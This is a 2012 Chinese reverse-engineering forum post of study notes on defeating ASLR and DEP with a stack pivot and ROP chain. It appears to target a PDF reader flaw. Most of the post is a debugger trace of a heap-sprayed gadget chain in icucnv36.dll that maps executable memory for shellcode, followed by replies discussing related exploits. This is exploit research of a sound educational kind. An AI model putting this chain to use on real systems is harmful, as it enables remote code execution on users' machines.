首页
社区
课程
招聘
[原创]利用stackpivot和ROP绕过ASLR+DEP学习笔记
发表于: 2012-2-10 16:50 12055

[原创]利用stackpivot和ROP绕过ASLR+DEP学习笔记

2012-2-10 16:50
12055
mov     eax, [ecx]  ; 取对象的虚函数表指针,而这个指针指向被释放的堆,记[ecx] = lpVtbl
push    1
push    0
push    0EBh
push    ecx
call    dword ptr [eax+1Ch]  ; 调用虚函数导致任意代码执行
test    eax, eax
setnz   al
retn
lpVtbl+1C  4A8453C3  icucnv36.4A8453C3
...
lpVtbl+3C  0C0C0C0C
...
0C0C0C0C ==>    > 0C0C0C0C
0C0C0C0C+4      > 0C0C0C0C
0C0C0C0C+8      > 4A806F29  RETURN to icucnv36.4A806F29 from icucnv36.icu_3_6::UnicodeString::doCompare
0C0C0C0C+C      > 4A8A0000  ASCII "UTF-32"
0C0C0C0C+10     > 4A802196  icucnv36.4A802196
0C0C0C0C+14     > 4A801F90  icucnv36.4A801F90
0C0C0C0C+18     > 4A806F29  RETURN to icucnv36.4A806F29 from icucnv36.icu_3_6::UnicodeString::doCompare
0C0C0C0C+1C     > 4A806CEF  icucnv36.4A806CEF
0C0C0C0C+20     > 00000000
0C0C0C0C+24     > 00000000
0C0C0C0C+28     > 00000000
0C0C0C0C+2C     > 00000000
0C0C0C0C+30     > 00000000
0C0C0C0C+34     > 00000002
0C0C0C0C+38     > 00000102
0C0C0C0C+3C     > 4A806F29  RETURN to icucnv36.4A806F29 from icucnv36.icu_3_6::UnicodeString::doCompare
0C0C0C0C+40     > 00000000
0C0C0C0C+44     > 00000000
0C0C0C0C+48     > 00000000
0C0C0C0C+4C     > 00000000
0C0C0C0C+50     > 00000000
0C0C0C0C+54     > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+58     > 4A801F90  icucnv36.4A801F90
0C0C0C0C+5C     > 4A849038  <&KERNEL32.CreateFileMappingA>
0C0C0C0C+60     > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+64     > 00000000
0C0C0C0C+68     > 00000000
0C0C0C0C+6C     > 00000000
0C0C0C0C+70     > 00000000
0C0C0C0C+74     > 00000000
0C0C0C0C+78     > 4A8A0000  ASCII "UTF-32"
0C0C0C0C+7C     > 4A802196  icucnv36.4A802196
0C0C0C0C+80     > 4A801F90  icucnv36.4A801F90
0C0C0C0C+84     > 4A84903C  <&KERNEL32.CreateFileA>
0C0C0C0C+88     > 4A80B692  icucnv36.4A80B692
0C0C0C0C+8C     > 4A801064  icucnv36.4A801064
0C0C0C0C+90     > 00000000
0C0C0C0C+94     > 10000000  sqlite.10000000
0C0C0C0C+98     > 00000000
0C0C0C0C+9C     > 00000000
0C0C0C0C+A0     > 00000002
0C0C0C0C+A4     > 00000102
0C0C0C0C+A8     > 00000000
0C0C0C0C+AC     > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+B0     > 4A801064  icucnv36.4A801064
0C0C0C0C+B4     > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+B8     > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+BC     > 00000008
0C0C0C0C+C0     > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+C4     > 4A801F90  icucnv36.4A801F90
0C0C0C0C+C8     > 4A849038  <&KERNEL32.CreateFileMappingA>
0C0C0C0C+CC     > 4A80B692  icucnv36.4A80B692
0C0C0C0C+D0     > 4A801064  icucnv36.4A801064
0C0C0C0C+D4     > FFFFFFFF
0C0C0C0C+D8     > 00000000
0C0C0C0C+DC     > 00000040
0C0C0C0C+E0     > 00000000
0C0C0C0C+E4     > 00010000  UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"
0C0C0C0C+E8     > 00000000
0C0C0C0C+EC     > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+F0     > 4A801064  icucnv36.4A801064
0C0C0C0C+F4     > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+F8     > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+FC     > 00000008
0C0C0C0C+100    > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+104    > 4A801F90  icucnv36.4A801F90
0C0C0C0C+108    > 4A849030  <&KERNEL32.MapViewOfFile>
0C0C0C0C+10C    > 4A80B692  icucnv36.4A80B692
0C0C0C0C+110    > 4A801064  icucnv36.4A801064
0C0C0C0C+114    > FFFFFFFF
0C0C0C0C+118    > 00000022
0C0C0C0C+11C    > 00000000
0C0C0C0C+120    > 00000000
0C0C0C0C+124    > 00010000  UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"
0C0C0C0C+128    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+12C    > 4A8A0004  ASCII "32"
0C0C0C0C+130    > 4A802196  icucnv36.4A802196
0C0C0C0C+134    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+138    > 4A801064  icucnv36.4A801064
0C0C0C0C+13C    > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+140    > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+144    > 00000030
0C0C0C0C+148    > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+14C    > 4A801F90  icucnv36.4A801F90
0C0C0C0C+150    > 4A8A0004  ASCII "32"
0C0C0C0C+154    > 4A80A7D8  RETURN to icucnv36.4A80A7D8 from msvcr80.__timezone
0C0C0C0C+158    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+15C    > 4A801064  icucnv36.4A801064
0C0C0C0C+160    > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+164    > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+168    > 00000020
0C0C0C0C+16C    > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+170    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+174    > 4A801064  icucnv36.4A801064
0C0C0C0C+178    > 4A80AEDC  icucnv36.4A80AEDC
0C0C0C0C+17C    > 4A801F90  icucnv36.4A801F90
0C0C0C0C+180    > 00000034
0C0C0C0C+184    > 4A80D585  icucnv36.4A80D585
0C0C0C0C+188    > 4A8063A5  icucnv36.4A8063A5
0C0C0C0C+18C    > 4A801064  icucnv36.4A801064
0C0C0C0C+190    > 4A842DB2  icucnv36.4A842DB2
0C0C0C0C+194    > 4A802AB1  icucnv36.4A802AB1
0C0C0C0C+198    > 0000000A
0C0C0C0C+19C    > 4A80A8A6  icucnv36.4A80A8A6
0C0C0C0C+1A0    > 4A801F90  icucnv36.4A801F90
0C0C0C0C+1A4    > 4A849170  <&MSVCR80.memcpy>
0C0C0C0C+1A8    > 4A80B692  icucnv36.4A80B692
0C0C0C0C+1AC    > FFFFFFFF
0C0C0C0C+1B0    > FFFFFFFF
0C0C0C0C+1B4    > FFFFFFFF
0C0C0C0C+1B8    > 00001000
4A8453C3    8B48 3C         mov     ecx, dword ptr [eax+3C]  ; ecx = [eax+3C] = 0C0C0C0C
4A8453C6    8B01            mov     eax, dword ptr [ecx]  ; eax = [ecx] = 0C0C0C0C
4A8453C8    FF50 1C         call    dword ptr [eax+1C]  ; [eax+1C] = [0C0C0C0C+1C] = icucnv36.4A806CEF
4A806CEF    94              xchg    eax, esp  ; stackpivot, esp = 0C0C0C0C, eax = 0012EF00
4A806CF0    C0EB 02         shr     bl, 2
4A806CF3    32C0            xor     al, al
4A806CF5    5F              pop     edi  ; edi = [0C0C0C0C] = 0C0C0C0C
4A806CF6    5E              pop     esi  ; esi = [0C0C0C0C+4] = 0C0C0C0C
4A806CF7    C3              retn  ; RETURN to [0C0C0C0C+8] = icucnv36.4A806F29
4A806F29    5F              pop     edi  ; edi = [0C0C0C0C+C] = icucnv36.4A8A0000
4A806F2A    5E              pop     esi  ; esi = [0C0C0C0C+10] = icucnv36.4A802196
4A806F2B    5D              pop     ebp  ; ebp = [0C0C0C0C+14] = icucnv36.4A801F90
4A806F2C    C2 1400         retn    14  ; RETURN to [0C0C0C0C+18] = icucnv36.4A806F29
4A806F29    5F              pop     edi  ; edi = [0C0C0C0C+30] = 0
4A806F2A    5E              pop     esi  ; esi = [0C0C0C0C+34] = 2
4A806F2B    5D              pop     ebp  ; ebp = [0C0C0C0C+38] = 102
4A806F2C    C2 1400         retn    14  ; RETURN to [0C0C0C0C+3C] = icucnv36.4A806F29
4A806F29    5F              pop     edi  ; edi = [0C0C0C0C+54] = icucnv36.4A80A8A6
4A806F2A    5E              pop     esi  ; esi = [0C0C0C0C+58] = icucnv36.4A801F90
4A806F2B    5D              pop     ebp  ; ebp = [0C0C0C0C+5C] = &KERNEL32.CreateFileMappingA
4A806F2C    C2 1400         retn    14  ; RETURN to [0C0C0C0C+60] = icucnv36.4A8063A5
4A8063A5    59              pop     ecx  ; ecx = [0C0C0C0C+78] = icucnv36.4A8A0000
4A8063A6    C3              retn  ; RETURN to [0C0C0C0C+7C] = icucnv36.4A802196
4A802196    8901            mov     dword ptr [ecx], eax  ; [ecx] = [4A8A0000] = eax = 0012EF00 
4A802198    C3              retn  ; RETURN to [0C0C0C0C+80] = icucnv36.4A801F90
4A801F90    58              pop     eax  ; eax = [0C0C0C0C+84] = &KERNEL32.CreateFileA
4A801F91    C3              retn  ; RETURN to [0C0C0C0C+88] = icucnv36.4A80B692
4A80B692  - FF20            jmp     dword ptr [eax]           ; JUMP to [eax] = kernel32.CreateFileA
0C0C0C0C+8C     > 4A801064  /CALL to CreateFileA
0C0C0C0C+90     > 00000000  |FileName = NULL
0C0C0C0C+94     > 10000000  |Access = GENERIC_ALL
0C0C0C0C+98     > 00000000  |ShareMode = 0
0C0C0C0C+9C     > 00000000  |pSecurity = NULL
0C0C0C0C+A0     > 00000002  |Mode = CREATE_ALWAYS
0C0C0C0C+A4     > 00000102  |Attributes = HIDDEN|TEMPORARY
0C0C0C0C+A8     > 00000000  \hTemplateFile = NULL
eax = hFile
4A801064    C3              retn  ; RETURN to [0C0C0C0C+AC] = icucnv36.4A8063A5
4A8063A5    59              pop     ecx  ; ecx = [0C0C0C0C+B0] = icucnv36.4A801064
4A8063A6    C3              retn  ; RETURN to [0C0C0C0C+B4] = icucnv36.4A842DB2
4A842DB2    97              xchg    eax, edi  ; edi = hFile, eax = icucnv36.4A80A8A6
4A842DB3    C3              retn  ; RETURN to [0C0C0C0C+B8] = icucnv36.4A802AB1
4A802AB1    5B              pop     ebx  ; ebx = [0C0C0C0C+BC] = 8
4A802AB2    C3              retn  ; RETURN to [0C0C0C0C+C0] = icucnv36.4A80A8A6
4A80A8A6    213C5C          and     dword ptr [esp+ebx*2], edi  ; [esp+ebx*2] = [0C0C0C0C+D4] = edi = hFile
4A80A8A9    75 03           jnz     short 4A80A8AE  ; JUMP to icucnv36.4A80A8AE
4A80A8AB    B0 01           mov     al, 1
4A80A8AD    C3              retn
4A80A8AE    3C 2F           cmp     al, 2F
4A80A8B0  ^ 74 F9           je      short 4A80A8AB
4A80A8B2    3C 41           cmp     al, 41
4A80A8B4    7C 04           jl      short 4A80A8BA
4A80A8B6    3C 5A           cmp     al, 5A
4A80A8B8    7E 08           jle     short 4A80A8C2
4A80A8BA    3C 61           cmp     al, 61
4A80A8BC    7C 0A           jl      short 4A80A8C8
4A80A8BE    3C 7A           cmp     al, 7A
4A80A8C0    7F 06           jg      short 4A80A8C8
4A80A8C2    8079 01 3A      cmp     byte ptr [ecx+1], 3A
4A80A8C6  ^ 74 E3           je      short 4A80A8AB
4A80A8C8    32C0            xor     al, al
4A80A8CA    C3              retn  ; RETURN to [0C0C0C0C+C4] = icucnv36.4A801F90
4A801F90    58              pop     eax  ; eax = [0C0C0C0C+C8] = &KERNEL32.CreateFileMappingA
4A801F91    C3              retn  ; RETURN to [0C0C0C0C+CC] = icucnv36.4A80B692
4A80B692  - FF20            jmp     dword ptr [eax]  ; JUMP to [eax] = kernel32.CreateFileMappingA
0C0C0C0C+D0     > 4A801064  /CALL to CreateFileMappingA
0C0C0C0C+D4     > FFFFFFFF  |hFile = FFFFFFFF
0C0C0C0C+D8     > 00000000  |pSecurity = NULL
0C0C0C0C+DC     > 00000040  |Protection = PAGE_EXECUTE_READWRITE
0C0C0C0C+E0     > 00000000  |MaximumSizeHigh = 0
0C0C0C0C+E4     > 00010000  |MaximumSizeLow = 10000
0C0C0C0C+E8     > 00000000  \MapName = NULL
eax = hMapObject
4A801064    C3              retn  ; RETURN to [0C0C0C0C+EC] = icucnv36.4A8063A5
4A8063A5    59              pop     ecx  ; ecx = [0C0C0C0C+F0] = icucnv36.4A801064
4A8063A6    C3              retn  ; RETURN to [0C0C0C0C+F4] = icucnv36.4A842DB2
4A842DB2    97              xchg    eax, edi  ; edi = hMapObject, eax = hFile
4A842DB3    C3              retn  ; RETURN to [0C0C0C0C+F8] = icucnv36.4A802AB1
4A802AB1    5B              pop     ebx  ; ebx = [0C0C0C0C+FC] = 8
4A802AB2    C3              retn  ; RETURN to [0C0C0C0C+100] = icucnv36.4A80A8A6
4A80A8A6    213C5C          and     dword ptr [esp+ebx*2], edi  ; [esp+ebx*2] = [0C0C0C0C+114] = edi = hMapObject
4A80A8A9    75 03           jnz     short 4A80A8AE  ; JUMP to icucnv36.4A80A8AE
4A80A8AB    B0 01           mov     al, 1
4A80A8AD    C3              retn
4A80A8AE    3C 2F           cmp     al, 2F
4A80A8B0  ^ 74 F9           je      short 4A80A8AB
4A80A8B2    3C 41           cmp     al, 41
4A80A8B4    7C 04           jl      short 4A80A8BA
4A80A8B6    3C 5A           cmp     al, 5A
4A80A8B8    7E 08           jle     short 4A80A8C2
4A80A8BA    3C 61           cmp     al, 61
4A80A8BC    7C 0A           jl      short 4A80A8C8
4A80A8BE    3C 7A           cmp     al, 7A
4A80A8C0    7F 06           jg      short 4A80A8C8
4A80A8C2    8079 01 3A      cmp     byte ptr [ecx+1], 3A
4A80A8C6  ^ 74 E3           je      short 4A80A8AB
4A80A8C8    32C0            xor     al, al
4A80A8CA    C3              retn  ; RETURN to [0C0C0C0C+104] = icucnv36.4A801F90
4A801F90    58              pop     eax  ; eax = [0C0C0C0C+108] = &KERNEL32.MapViewOfFile
4A801F91    C3              retn  ; RETURN to [0C0C0C0C+10C] = icucnv36.4A80B692
4A80B692  - FF20            jmp     dword ptr [eax]  ; JUMP to [eax] = kernel32.MapViewOfFile

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 6
支持
分享
最新回复 (19)
雪    币: 1015
活跃值: (235)
能力值: ( LV12,RANK:440 )
在线值:
发帖
回帖
粉丝
2
先回帖再学习!
2012-2-10 16:51
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
3
去年有分析该漏洞的实际病毒样本,也大多是利用这些API函数来绕过DEP:创建临时文件,然后内存映射,再复制shellcode。
2012-2-10 17:45
0
雪    币: 6
活跃值: (1141)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
说的清楚明白,顶贴
2012-2-10 17:49
0
雪    币: 95
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
恩 前段时间分析的一个利用较老漏洞的pdf也用的这个方法 交换了栈
2012-2-11 10:40
0
雪    币: 1491
活跃值: (985)
能力值: (RANK:860 )
在线值:
发帖
回帖
粉丝
6
大概2010年的时候调试一个PDF漏洞时发现利用的这个方法。。。
比较老了。呵呵
2012-2-12 22:05
0
雪    币: 71
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
学习学习

谢谢lz
2012-2-12 22:18
0
雪    币: 220
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
嗯 学习一下
2012-2-13 00:36
0
雪    币: 292
活跃值: (153)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
9
谢谢 楼主 分享~
2012-2-13 00:37
0
雪    币: 142
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
虽然看不懂,但是觉得好厉害
2012-2-13 00:43
0
雪    币: 234
活跃值: (83)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
11
顶啊顶啊顶~~~~~~
2012-2-13 13:39
0
雪    币: 306
活跃值: (85)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
12
标志一下,晚上再看..
2012-2-13 13:59
0
雪    币: 45
活跃值: (22)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
13
adobe reader cooltype话漏洞的poc,也使用了创建临时文件再map的方法,但是该漏洞是栈溢出。不知你是否指的这个漏洞?
2012-2-14 00:08
0
雪    币: 219
活跃值: (783)
能力值: (RANK:290 )
在线值:
发帖
回帖
粉丝
14
顶啊顶啊顶  看看在说
2012-2-21 14:52
0
雪    币: 62
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
我靠,真tnnd的n
2012-2-24 19:20
0
雪    币: 17
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
是说的CVE-2010-2883么,当时用的3.4版本的IBM的库
2012-3-3 10:40
0
雪    币: 170
活跃值: (31)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
pbt
17
说的清楚明白,顶贴,很好啊
2012-3-8 18:14
0
雪    币: 159
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
特意登录顶帖,好帖必须顶起!!!
2012-5-8 22:53
0
雪    币: 34
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
19
楼主有做出相应的POC么,不知道能不能和我共享下~我的邮箱:695473585@qq.com
2012-11-30 16:13
0
雪    币: 589
活跃值: (119)
能力值: ( LV11,RANK:190 )
在线值:
发帖
回帖
粉丝
20
MSF上有
2012-12-4 11:54
0
游客
登录 | 注册 方可回帖
返回
//